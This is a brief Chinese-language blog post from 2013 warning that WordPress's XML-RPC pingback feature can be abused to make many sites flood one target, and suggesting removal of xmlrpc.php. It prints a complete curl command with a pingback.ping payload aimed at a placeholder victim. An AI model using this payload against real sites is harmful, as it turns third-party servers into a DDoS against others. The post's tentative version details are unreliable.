WordPress 的這個弱點去年 12 月就被 po 出,只要攻擊端利用以下指令,它會讓所有 WP 網站同時間去 request 一個例如叫作 attacked.site.com 的網站,1000個 WP就是同時 1000 request 攻擊你的網站,一般網站應該很難承受吧。

curl http://www.example.com/xmlrpc.php -d 
 '<?xml version="1.0" encoding="iso-8859-1"?><methodCall><methodName>
 pingback.ping</methodName><params><param><value>
 <string>http://attacked.site.com/link_to_post
 </string></value></param><param><value><string>
http://www.example.com/any_blog_post/
 </string></value></param></params></methodCall>'

xmlrpc 這個機制直到 WP 3.5 版才預設禁用的, 3.5.1 版好像修正以上的漏洞 ??

不放心的話就把 xmlrpc.php 移除比較快。

參考 : http://hackread.com/wordpress-default-leaves-millions-of-sites-vulnerable-to-ddos-attacks/

最後修改日期: 2013 年 05 月 02 日

作者

留言

撰寫回覆或留言

發佈留言必須填寫的電子郵件地址不會公開。